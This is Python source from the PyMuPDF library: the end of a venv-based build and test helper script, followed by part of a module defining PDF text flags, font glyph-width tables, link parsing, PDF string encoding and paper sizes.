venv_name = f'venv-pymupdf-{platform.python_version()}-{cpu_bits()}'
def venv( command=None, packages=None, quick=False, system_site_packages=False):
'''
Runs remaining args, or the specified command if present, in a venv.
command:
Command as string or list of args. Should usually start with 'python'
to run the venv's python.
packages:
List of packages (or comma-separated string) to install.
quick:
If true and venv directory already exists, we don't recreate venv or
install Python packages in it.
'''
command2 = ''
if platform.system() == 'OpenBSD':
# libclang not available from pypi.org, but system py3-llvm package
# works. `pip install` should be run with --no-build-isolation and
# explicit `pip install swig psutil`.
system_site_packages = True
#ssp = ' --system-site-packages'
log(f'OpenBSD: libclang not available from pypi.org.')
log(f'OpenBSD: system package `py3-llvm` must be installed.')
log(f'OpenBSD: creating venv with --system-site-packages.')
log(f'OpenBSD: `pip install .../PyMuPDF` must be preceded by install of swig etc.')
ssp = ' --system-site-packages' if system_site_packages else ''
if quick and os.path.isdir(venv_name):
log(f'{quick=}: Not creating venv because directory already exists: {venv_name}')
command2 += 'true'
else:
quick = False
command2 += f'{sys.executable} -m venv{ssp} {venv_name}'
if platform.system() == 'Windows':
command2 += f' && {venv_name}\\Scripts\\activate'
else:
command2 += f' && . {venv_name}/bin/activate'
if quick:
log(f'{quick=}: Not upgrading pip or installing packages.')
else:
command2 += ' && python -m pip install --upgrade pip'
if packages:
if isinstance(packages, str):
packages = packages.split(',')
command2 += ' && pip install ' + ' '.join(packages)
command2 += ' &&'
if isinstance( command, str):
command2 += ' ' + command
else:
for arg in command:
command2 += ' ' + shlex.quote(arg)
run( command2)
def test( project, package, valgrind):
run(f'pip install {test_packages}')
if valgrind:
log('Installing valgrind.')
run(f'sudo apt update')
run(f'sudo apt install valgrind')
run(f'valgrind --version')
log('Running PyMuPDF tests under valgrind.')
# We ignore memory leaks.
run(
f'{sys.executable} {project}/tests/run_compound.py'
f' valgrind --suppressions={project}/valgrind.supp --error-exitcode=100 --errors-for-leak-kinds=none --fullpath-after='
f' pytest {project}/tests'
,
env_extra=dict(
PYTHONMALLOC='malloc',
PYMUPDF_RUNNING_ON_VALGRIND='1',
),
)
else:
run(f'{sys.executable} {project}/tests/run_compound.py pytest {project}/tests')
if platform.system() == 'Windows':
def relpath(path, start=None):
try:
return os.path.relpath(path, start)
except ValueError:
# os.path.relpath() fails if trying to change drives.
return os.path.abspath(path)
else:
def relpath(path, start=None):
return os.path.relpath(path, start)
def log(text, caller=0):
'''
Writes `text` to stdout with prefix showing caller path relative to
pymupdf_dir and fn name.
'''
frame_record = inspect.stack( context=0)[ caller+1]
filename = frame_record.filename
line = frame_record.lineno
function = frame_record.function
prefix = f'{relpath(filename, pymupdf_dir)}:{line}:{function}(): '
print(textwrap.indent(text, prefix), flush=1)
def run(command, env_extra=None, check=1, timeout=None):
'''
Runs a command using subprocess.run().
Args:
command:
The command to run.
env_extra:
None or dict containing extra environment variable settings to add
to os.environ.
check:
Whether to raise exception if command fails.
timeout:
If not None, timeout in seconds; passed directory to
subprocess.run(). Note that on MacOS subprocess.run() seems to
leave processes running if timeout expires.
'''
env = None
message = 'Running: '
if env_extra:
env = os.environ.copy()
env.update(env_extra)
message += '\n[environment:\n'
for n, v in env_extra.items():
message += f' {n}={shlex.quote(v)}\n'
message += ']\n'
message += f'{command}'
log(message, caller=1)
return subprocess.run(command, check=check, shell=1, env=env, timeout=timeout)
def platform_tag():
bits = cpu_bits()
if platform.system() == 'Windows':
return 'win32' if bits==32 else 'win_amd64'
elif platform.system() in ('Linux', 'Darwin'):
assert bits == 64
return platform.machine()
#return 'x86_64'
else:
assert 0, f'Unrecognised: {platform.system()=}'
test_packages = 'pytest fontTools pymupdf-fonts flake8 pylint codespell'
if platform.system() == 'Windows' and cpu_bits() == 32:
# No pillow wheel available, and doesn't build easily.
pass
else:
test_packages += ' pillow'
if platform.system().startswith('MSYS_NT-'):
# psutil not available on msys2.
pass
else:
test_packages += ' psutil'
if __name__ == '__main__':
main()
| 24,505 | Python | .py | 565 | 33.076106 | 139 | 0.591227 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,384 | helper-python.i | pymupdf_PyMuPDF/src_classic/helper-python.i | %pythoncode %{
# ------------------------------------------------------------------------
# Copyright 2020-2022, Harald Lieder, mailto:harald.lieder@outlook.com
# License: GNU AFFERO GPL 3.0, https://www.gnu.org/licenses/agpl-3.0.html
#
# Part of "PyMuPDF", a Python binding for "MuPDF" (http://mupdf.com), a
# lightweight PDF, XPS, and E-book viewer, renderer and toolkit which is
# maintained and developed by Artifex Software, Inc. https://artifex.com.
# ------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# Various PDF Optional Content Flags
# ------------------------------------------------------------------------------
PDF_OC_ON = 0
PDF_OC_TOGGLE = 1
PDF_OC_OFF = 2
# ------------------------------------------------------------------------------
# link kinds and link flags
# ------------------------------------------------------------------------------
LINK_NONE = 0
LINK_GOTO = 1
LINK_URI = 2
LINK_LAUNCH = 3
LINK_NAMED = 4
LINK_GOTOR = 5
LINK_FLAG_L_VALID = 1
LINK_FLAG_T_VALID = 2
LINK_FLAG_R_VALID = 4
LINK_FLAG_B_VALID = 8
LINK_FLAG_FIT_H = 16
LINK_FLAG_FIT_V = 32
LINK_FLAG_R_IS_ZOOM = 64
# ------------------------------------------------------------------------------
# Text handling flags
# ------------------------------------------------------------------------------
TEXT_ALIGN_LEFT = 0
TEXT_ALIGN_CENTER = 1
TEXT_ALIGN_RIGHT = 2
TEXT_ALIGN_JUSTIFY = 3
TEXT_OUTPUT_TEXT = 0
TEXT_OUTPUT_HTML = 1
TEXT_OUTPUT_JSON = 2
TEXT_OUTPUT_XML = 3
TEXT_OUTPUT_XHTML = 4
TEXT_PRESERVE_LIGATURES = 1
TEXT_PRESERVE_WHITESPACE = 2
TEXT_PRESERVE_IMAGES = 4
TEXT_INHIBIT_SPACES = 8
TEXT_DEHYPHENATE = 16
TEXT_PRESERVE_SPANS = 32
TEXT_MEDIABOX_CLIP = 64
TEXT_CID_FOR_UNKNOWN_UNICODE = 128
TEXTFLAGS_WORDS = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_BLOCKS = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_DICT = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_PRESERVE_IMAGES
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_RAWDICT = TEXTFLAGS_DICT
TEXTFLAGS_SEARCH = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_DEHYPHENATE
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_HTML = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_PRESERVE_IMAGES
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_XHTML = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_PRESERVE_IMAGES
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_XML = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_TEXT = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
# ------------------------------------------------------------------------------
# Simple text encoding options
# ------------------------------------------------------------------------------
TEXT_ENCODING_LATIN = 0
TEXT_ENCODING_GREEK = 1
TEXT_ENCODING_CYRILLIC = 2
# ------------------------------------------------------------------------------
# Stamp annotation icon numbers
# ------------------------------------------------------------------------------
STAMP_Approved = 0
STAMP_AsIs = 1
STAMP_Confidential = 2
STAMP_Departmental = 3
STAMP_Experimental = 4
STAMP_Expired = 5
STAMP_Final = 6
STAMP_ForComment = 7
STAMP_ForPublicRelease = 8
STAMP_NotApproved = 9
STAMP_NotForPublicRelease = 10
STAMP_Sold = 11
STAMP_TopSecret = 12
STAMP_Draft = 13
# ------------------------------------------------------------------------------
# Base 14 font names and dictionary
# ------------------------------------------------------------------------------
Base14_fontnames = (
"Courier",
"Courier-Oblique",
"Courier-Bold",
"Courier-BoldOblique",
"Helvetica",
"Helvetica-Oblique",
"Helvetica-Bold",
"Helvetica-BoldOblique",
"Times-Roman",
"Times-Italic",
"Times-Bold",
"Times-BoldItalic",
"Symbol",
"ZapfDingbats",
)
Base14_fontdict = {}
for f in Base14_fontnames:
Base14_fontdict[f.lower()] = f
del f
Base14_fontdict["helv"] = "Helvetica"
Base14_fontdict["heit"] = "Helvetica-Oblique"
Base14_fontdict["hebo"] = "Helvetica-Bold"
Base14_fontdict["hebi"] = "Helvetica-BoldOblique"
Base14_fontdict["cour"] = "Courier"
Base14_fontdict["coit"] = "Courier-Oblique"
Base14_fontdict["cobo"] = "Courier-Bold"
Base14_fontdict["cobi"] = "Courier-BoldOblique"
Base14_fontdict["tiro"] = "Times-Roman"
Base14_fontdict["tibo"] = "Times-Bold"
Base14_fontdict["tiit"] = "Times-Italic"
Base14_fontdict["tibi"] = "Times-BoldItalic"
Base14_fontdict["symb"] = "Symbol"
Base14_fontdict["zadb"] = "ZapfDingbats"
annot_skel = {
"goto1": "<</A<</S/GoTo/D[%i 0 R/XYZ %g %g %g]>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"goto2": "<</A<</S/GoTo/D%s>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"gotor1": "<</A<</S/GoToR/D[%i /XYZ %g %g %g]/F<</F(%s)/UF(%s)/Type/Filespec>>>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"gotor2": "<</A<</S/GoToR/D%s/F(%s)>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"launch": "<</A<</S/Launch/F<</F(%s)/UF(%s)/Type/Filespec>>>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"uri": "<</A<</S/URI/URI(%s)>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"named": "<</A<</S/Named/N/%s/Type/Action>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
}
class FileDataError(RuntimeError):
"""Raised for documents with file structure issues."""
pass
class FileNotFoundError(RuntimeError):
"""Raised if file does not exist."""
pass
class EmptyFileError(FileDataError):
"""Raised when creating documents from zero-length data."""
pass
# propagate exception class to C-level code
_set_FileDataError(FileDataError)
def css_for_pymupdf_font(
fontcode: str, *, CSS: OptStr = None, archive: AnyType = None, name: OptStr = None
) -> str:
"""Create @font-face items for the given fontcode of pymupdf-fonts.
Adds @font-face support for fonts contained in package pymupdf-fonts.
Creates a CSS font-family for all fonts starting with string 'fontcode'.
Note:
The font naming convention in package pymupdf-fonts is "fontcode<sf>",
where the suffix "sf" is either empty or one of "it", "bo" or "bi".
These suffixes thus represent the regular, italic, bold or bold-italic
variants of a font. For example, font code "notos" refers to fonts
"notos" - "Noto Sans Regular"
"notosit" - "Noto Sans Italic"
"notosbo" - "Noto Sans Bold"
"notosbi" - "Noto Sans Bold Italic"
This function creates four CSS @font-face definitions and collectively
assigns the font-family name "notos" to them (or the "name" value).
All fitting font buffers of the pymupdf-fonts package are placed / added
to the archive provided as parameter.
To use the font in fitz.Story, execute 'set_font(fontcode)'. The correct
font weight (bold) or style (italic) will automatically be selected.
Expects and returns the CSS source, with the new CSS definitions appended.
Args:
fontcode: (str) font code for naming the font variants to include.
E.g. "fig" adds notos, notosi, notosb, notosbi fonts.
A maximum of 4 font variants is accepted.
CSS: (str) CSS string to add @font-face definitions to.
archive: (Archive, mandatory) where to place the font buffers.
name: (str) use this as family-name instead of 'fontcode'.
Returns:
Modified CSS, with appended @font-face statements for each font variant
of fontcode.
Fontbuffers associated with "fontcode" will be added to 'archive'.
"""
# @font-face template string
CSSFONT = "\n@font-face {font-family: %s; src: url(%s);%s%s}\n"
if not type(archive) is Archive:
raise ValueError("'archive' must be an Archive")
if CSS == None:
CSS = ""
# select font codes starting with the pass-in string
font_keys = [k for k in fitz_fontdescriptors.keys() if k.startswith(fontcode)]
if font_keys == []:
raise ValueError(f"No font code '{fontcode}' found in pymupdf-fonts.")
if len(font_keys) > 4:
raise ValueError("fontcode too short")
if name == None: # use this name for font-family
name = fontcode
for fkey in font_keys:
font = fitz_fontdescriptors[fkey]
bold = font["bold"] # determine font property
italic = font["italic"] # determine font property
fbuff = font["loader"]() # load the fontbuffer
archive.add(fbuff, fkey) # update the archive
bold_text = "font-weight: bold;" if bold else ""
italic_text = "font-style: italic;" if italic else ""
CSS += CSSFONT % (name, fkey, bold_text, italic_text)
return CSS
def get_text_length(text: str, fontname: str ="helv", fontsize: float =11, encoding: int =0) -> float:
"""Calculate length of a string for a built-in font.
Args:
fontname: name of the font.
fontsize: font size points.
encoding: encoding to use, 0=Latin (default), 1=Greek, 2=Cyrillic.
Returns:
(float) length of text.
"""
fontname = fontname.lower()
basename = Base14_fontdict.get(fontname, None)
glyphs = None
if basename == "Symbol":
glyphs = symbol_glyphs
if basename == "ZapfDingbats":
glyphs = zapf_glyphs
if glyphs is not None:
w = sum([glyphs[ord(c)][1] if ord(c) < 256 else glyphs[183][1] for c in text])
return w * fontsize
if fontname in Base14_fontdict.keys():
return util_measure_string(
text, Base14_fontdict[fontname], fontsize, encoding
)
if fontname in (
"china-t",
"china-s",
"china-ts",
"china-ss",
"japan",
"japan-s",
"korea",
"korea-s",
):
return len(text) * fontsize
raise ValueError("Font '%s' is unsupported" % fontname)
# ------------------------------------------------------------------------------
# Glyph list for the built-in font 'ZapfDingbats'
# ------------------------------------------------------------------------------
zapf_glyphs = (
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(32, 0.278),
(33, 0.974),
(34, 0.961),
(35, 0.974),
(36, 0.98),
(37, 0.719),
(38, 0.789),
(39, 0.79),
(40, 0.791),
(41, 0.69),
(42, 0.96),
(43, 0.939),
(44, 0.549),
(45, 0.855),
(46, 0.911),
(47, 0.933),
(48, 0.911),
(49, 0.945),
(50, 0.974),
(51, 0.755),
(52, 0.846),
(53, 0.762),
(54, 0.761),
(55, 0.571),
(56, 0.677),
(57, 0.763),
(58, 0.76),
(59, 0.759),
(60, 0.754),
(61, 0.494),
(62, 0.552),
(63, 0.537),
(64, 0.577),
(65, 0.692),
(66, 0.786),
(67, 0.788),
(68, 0.788),
(69, 0.79),
(70, 0.793),
(71, 0.794),
(72, 0.816),
(73, 0.823),
(74, 0.789),
(75, 0.841),
(76, 0.823),
(77, 0.833),
(78, 0.816),
(79, 0.831),
(80, 0.923),
(81, 0.744),
(82, 0.723),
(83, 0.749),
(84, 0.79),
(85, 0.792),
(86, 0.695),
(87, 0.776),
(88, 0.768),
(89, 0.792),
(90, 0.759),
(91, 0.707),
(92, 0.708),
(93, 0.682),
(94, 0.701),
(95, 0.826),
(96, 0.815),
(97, 0.789),
(98, 0.789),
(99, 0.707),
(100, 0.687),
(101, 0.696),
(102, 0.689),
(103, 0.786),
(104, 0.787),
(105, 0.713),
(106, 0.791),
(107, 0.785),
(108, 0.791),
(109, 0.873),
(110, 0.761),
(111, 0.762),
(112, 0.762),
(113, 0.759),
(114, 0.759),
(115, 0.892),
(116, 0.892),
(117, 0.788),
(118, 0.784),
(119, 0.438),
(120, 0.138),
(121, 0.277),
(122, 0.415),
(123, 0.392),
(124, 0.392),
(125, 0.668),
(126, 0.668),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(161, 0.732),
(162, 0.544),
(163, 0.544),
(164, 0.91),
(165, 0.667),
(166, 0.76),
(167, 0.76),
(168, 0.776),
(169, 0.595),
(170, 0.694),
(171, 0.626),
(172, 0.788),
(173, 0.788),
(174, 0.788),
(175, 0.788),
(176, 0.788),
(177, 0.788),
(178, 0.788),
(179, 0.788),
(180, 0.788),
(181, 0.788),
(182, 0.788),
(183, 0.788),
(184, 0.788),
(185, 0.788),
(186, 0.788),
(187, 0.788),
(188, 0.788),
(189, 0.788),
(190, 0.788),
(191, 0.788),
(192, 0.788),
(193, 0.788),
(194, 0.788),
(195, 0.788),
(196, 0.788),
(197, 0.788),
(198, 0.788),
(199, 0.788),
(200, 0.788),
(201, 0.788),
(202, 0.788),
(203, 0.788),
(204, 0.788),
(205, 0.788),
(206, 0.788),
(207, 0.788),
(208, 0.788),
(209, 0.788),
(210, 0.788),
(211, 0.788),
(212, 0.894),
(213, 0.838),
(214, 1.016),
(215, 0.458),
(216, 0.748),
(217, 0.924),
(218, 0.748),
(219, 0.918),
(220, 0.927),
(221, 0.928),
(222, 0.928),
(223, 0.834),
(224, 0.873),
(225, 0.828),
(226, 0.924),
(227, 0.924),
(228, 0.917),
(229, 0.93),
(230, 0.931),
(231, 0.463),
(232, 0.883),
(233, 0.836),
(234, 0.836),
(235, 0.867),
(236, 0.867),
(237, 0.696),
(238, 0.696),
(239, 0.874),
(183, 0.788),
(241, 0.874),
(242, 0.76),
(243, 0.946),
(244, 0.771),
(245, 0.865),
(246, 0.771),
(247, 0.888),
(248, 0.967),
(249, 0.888),
(250, 0.831),
(251, 0.873),
(252, 0.927),
(253, 0.97),
(183, 0.788),
(183, 0.788),
)
# ------------------------------------------------------------------------------
# Glyph list for the built-in font 'Symbol'
# ------------------------------------------------------------------------------
symbol_glyphs = (
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(32, 0.25),
(33, 0.333),
(34, 0.713),
(35, 0.5),
(36, 0.549),
(37, 0.833),
(38, 0.778),
(39, 0.439),
(40, 0.333),
(41, 0.333),
(42, 0.5),
(43, 0.549),
(44, 0.25),
(45, 0.549),
(46, 0.25),
(47, 0.278),
(48, 0.5),
(49, 0.5),
(50, 0.5),
(51, 0.5),
(52, 0.5),
(53, 0.5),
(54, 0.5),
(55, 0.5),
(56, 0.5),
(57, 0.5),
(58, 0.278),
(59, 0.278),
(60, 0.549),
(61, 0.549),
(62, 0.549),
(63, 0.444),
(64, 0.549),
(65, 0.722),
(66, 0.667),
(67, 0.722),
(68, 0.612),
(69, 0.611),
(70, 0.763),
(71, 0.603),
(72, 0.722),
(73, 0.333),
(74, 0.631),
(75, 0.722),
(76, 0.686),
(77, 0.889),
(78, 0.722),
(79, 0.722),
(80, 0.768),
(81, 0.741),
(82, 0.556),
(83, 0.592),
(84, 0.611),
(85, 0.69),
(86, 0.439),
(87, 0.768),
(88, 0.645),
(89, 0.795),
(90, 0.611),
(91, 0.333),
(92, 0.863),
(93, 0.333),
(94, 0.658),
(95, 0.5),
(96, 0.5),
(97, 0.631),
(98, 0.549),
(99, 0.549),
(100, 0.494),
(101, 0.439),
(102, 0.521),
(103, 0.411),
(104, 0.603),
(105, 0.329),
(106, 0.603),
(107, 0.549),
(108, 0.549),
(109, 0.576),
(110, 0.521),
(111, 0.549),
(112, 0.549),
(113, 0.521),
(114, 0.549),
(115, 0.603),
(116, 0.439),
(117, 0.576),
(118, 0.713),
(119, 0.686),
(120, 0.493),
(121, 0.686),
(122, 0.494),
(123, 0.48),
(124, 0.2),
(125, 0.48),
(126, 0.549),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(160, 0.25),
(161, 0.62),
(162, 0.247),
(163, 0.549),
(164, 0.167),
(165, 0.713),
(166, 0.5),
(167, 0.753),
(168, 0.753),
(169, 0.753),
(170, 0.753),
(171, 1.042),
(172, 0.713),
(173, 0.603),
(174, 0.987),
(175, 0.603),
(176, 0.4),
(177, 0.549),
(178, 0.411),
(179, 0.549),
(180, 0.549),
(181, 0.576),
(182, 0.494),
(183, 0.46),
(184, 0.549),
(185, 0.549),
(186, 0.549),
(187, 0.549),
(188, 1),
(189, 0.603),
(190, 1),
(191, 0.658),
(192, 0.823),
(193, 0.686),
(194, 0.795),
(195, 0.987),
(196, 0.768),
(197, 0.768),
(198, 0.823),
(199, 0.768),
(200, 0.768),
(201, 0.713),
(202, 0.713),
(203, 0.713),
(204, 0.713),
(205, 0.713),
(206, 0.713),
(207, 0.713),
(208, 0.768),
(209, 0.713),
(210, 0.79),
(211, 0.79),
(212, 0.89),
(213, 0.823),
(214, 0.549),
(215, 0.549),
(216, 0.713),
(217, 0.603),
(218, 0.603),
(219, 1.042),
(220, 0.987),
(221, 0.603),
(222, 0.987),
(223, 0.603),
(224, 0.494),
(225, 0.329),
(226, 0.79),
(227, 0.79),
(228, 0.786),
(229, 0.713),
(230, 0.384),
(231, 0.384),
(232, 0.384),
(233, 0.384),
(234, 0.384),
(235, 0.384),
(236, 0.494),
(237, 0.494),
(238, 0.494),
(239, 0.494),
(183, 0.46),
(241, 0.329),
(242, 0.274),
(243, 0.686),
(244, 0.686),
(245, 0.686),
(246, 0.384),
(247, 0.549),
(248, 0.384),
(249, 0.384),
(250, 0.384),
(251, 0.384),
(252, 0.494),
(253, 0.494),
(254, 0.494),
(183, 0.46),
)
class linkDest(object):
"""link or outline destination details"""
def __init__(self, obj, rlink):
isExt = obj.is_external
isInt = not isExt
self.dest = ""
self.fileSpec = ""
self.flags = 0
self.isMap = False
self.isUri = False
self.kind = LINK_NONE
self.lt = Point(0, 0)
self.named = ""
self.newWindow = ""
self.page = obj.page
self.rb = Point(0, 0)
self.uri = obj.uri
if rlink and not self.uri.startswith("#"):
self.uri = "#page=%i&zoom=0,%g,%g" % (rlink[0] + 1, rlink[1], rlink[2])
if obj.is_external:
self.page = -1
self.kind = LINK_URI
if not self.uri:
self.page = -1
self.kind = LINK_NONE
if isInt and self.uri:
self.uri = self.uri.replace("&zoom=nan", "&zoom=0")
if self.uri.startswith("#"):
self.named = ""
self.kind = LINK_GOTO
m = re.match('^#page=([0-9]+)&zoom=([0-9.]+),(-?[0-9.]+),(-?[0-9.]+)$', self.uri)
if m:
self.page = int(m.group(1)) - 1
self.lt = Point(float((m.group(3))), float(m.group(4)))
self.flags = self.flags | LINK_FLAG_L_VALID | LINK_FLAG_T_VALID
else:
m = re.match('^#page=([0-9]+)$', self.uri)
if m:
self.page = int(m.group(1)) - 1
else:
self.kind = LINK_NAMED
self.named = self.uri[1:]
else:
self.kind = LINK_NAMED
self.named = self.uri
if obj.is_external:
if self.uri.startswith(("http://", "https://", "mailto:", "ftp://")):
self.isUri = True
self.kind = LINK_URI
elif self.uri.startswith("file://"):
self.fileSpec = self.uri[7:]
self.isUri = False
self.uri = ""
self.kind = LINK_LAUNCH
ftab = self.fileSpec.split("#")
if len(ftab) == 2:
if ftab[1].startswith("page="):
self.kind = LINK_GOTOR
self.fileSpec = ftab[0]
self.page = int(ftab[1][5:]) - 1
else:
self.isUri = True
self.kind = LINK_LAUNCH
# -------------------------------------------------------------------------------
# "Now" timestamp in PDF Format
# -------------------------------------------------------------------------------
def get_pdf_now() -> str:
import time
tz = "%s'%s'" % (
str(abs(time.altzone // 3600)).rjust(2, "0"),
str((abs(time.altzone // 60) % 60)).rjust(2, "0"),
)
tstamp = time.strftime("D:%Y%m%d%H%M%S", time.localtime())
if time.altzone > 0:
tstamp += "-" + tz
elif time.altzone < 0:
tstamp += "+" + tz
else:
pass
return tstamp
def get_pdf_str(s: str) -> str:
""" Return a PDF string depending on its coding.
Notes:
Returns a string bracketed with either "()" or "<>" for hex values.
If only ascii then "(original)" is returned, else if only 8 bit chars
then "(original)" with interspersed octal strings \nnn is returned,
else a string "<FEFF[hexstring]>" is returned, where [hexstring] is the
UTF-16BE encoding of the original.
"""
if not bool(s):
return "()"
def make_utf16be(s):
r = bytearray([254, 255]) + bytearray(s, "UTF-16BE")
return "<" + r.hex() + ">" # brackets indicate hex
# The following either returns the original string with mixed-in
# octal numbers \nnn for chars outside the ASCII range, or returns
# the UTF-16BE BOM version of the string.
r = ""
for c in s:
oc = ord(c)
if oc > 255: # shortcut if beyond 8-bit code range
return make_utf16be(s)
if oc > 31 and oc < 127: # in ASCII range
if c in ("(", ")", "\\"): # these need to be escaped
r += "\\"
r += c
continue
if oc > 127: # beyond ASCII
r += "\\%03o" % oc
continue
# now the white spaces
if oc == 8: # backspace
r += "\\b"
elif oc == 9: # tab
r += "\\t"
elif oc == 10: # line feed
r += "\\n"
elif oc == 12: # form feed
r += "\\f"
elif oc == 13: # carriage return
r += "\\r"
else:
r += "\\267" # unsupported: replace by 0xB7
return "(" + r + ")"
def getTJstr(text: str, glyphs: typing.Union[list, tuple, None], simple: bool, ordering: int) -> str:
""" Return a PDF string enclosed in [] brackets, suitable for the PDF TJ
operator.
Notes:
The input string is converted to either 2 or 4 hex digits per character.
Args:
simple: no glyphs: 2-chars, use char codes as the glyph
glyphs: 2-chars, use glyphs instead of char codes (Symbol,
ZapfDingbats)
not simple: ordering < 0: 4-chars, use glyphs not char codes
ordering >=0: a CJK font! 4 chars, use char codes as glyphs
"""
if text.startswith("[<") and text.endswith(">]"): # already done
return text
if not bool(text):
return "[<>]"
if simple: # each char or its glyph is coded as a 2-byte hex
if glyphs is None: # not Symbol, not ZapfDingbats: use char code
otxt = "".join(["%02x" % ord(c) if ord(c) < 256 else "b7" for c in text])
else: # Symbol or ZapfDingbats: use glyphs
otxt = "".join(
["%02x" % glyphs[ord(c)][0] if ord(c) < 256 else "b7" for c in text]
)
return "[<" + otxt + ">]"
# non-simple fonts: each char or its glyph is coded as 4-byte hex
if ordering < 0: # not a CJK font: use the glyphs
otxt = "".join(["%04x" % glyphs[ord(c)][0] for c in text])
else: # CJK: use the char codes
otxt = "".join(["%04x" % ord(c) for c in text])
return "[<" + otxt + ">]"
def paper_sizes():
"""Known paper formats @ 72 dpi as a dictionary. Key is the format string
like "a4" for ISO-A4. Value is the tuple (width, height).
Information taken from the following web sites:
www.din-formate.de
www.din-formate.info/amerikanische-formate.html
www.directtools.de/wissen/normen/iso.htm
"""
return {
"a0": (2384, 3370),
"a1": (1684, 2384),
"a10": (74, 105),
"a2": (1191, 1684),
"a3": (842, 1191),
"a4": (595, 842),
"a5": (420, 595),
"a6": (298, 420),
"a7": (210, 298),
"a8": (147, 210),
"a9": (105, 147),
"b0": (2835, 4008),
"b1": (2004, 2835),
"b10": (88, 125),
"b2": (1417, 2004),
"b3": (1001, 1417),
"b4": (709, 1001),
"b5": (499, 709),
"b6": (354, 499),
"b7": (249, 354),
"b8": (176, 249),
"b9": (125, 176),
"c0": (2599, 3677),
"c1": (1837, 2599),
"c10": (79, 113),
"c2": (1298, 1837),
"c3": (918, 1298),
"c4": (649, 918),
"c5": (459, 649),
"c6": (323, 459),
"c7": (230, 323),
"c8": (162, 230),
"c9": (113, 162),
"card-4x6": (288, 432),
"card-5x7": (360, 504),
"commercial": (297, 684),
"executive": (522, 756),
"invoice": (396, 612),
"ledger": (792, 1224),
"legal": (612, 1008),
"legal-13": (612, 936),
"letter": (612, 792),
"monarch": (279, 540),
"tabloid-extra": (864, 1296),
}
def paper_size(s: str) -> tuple:
"""Return a tuple (width, height) for a given paper format string.
Notes:
'A4-L' will return (842, 595), the values for A4 landscape.
Suffix '-P' and no suffix return the portrait tuple.
"""
size = s.lower()
f = "p"
if size.endswith("-l"):
f = "l"
size = size[:-2]
if size.endswith("-p"):
size = size[:-2]
rc = paper_sizes().get(size, (-1, -1))
if f == "p":
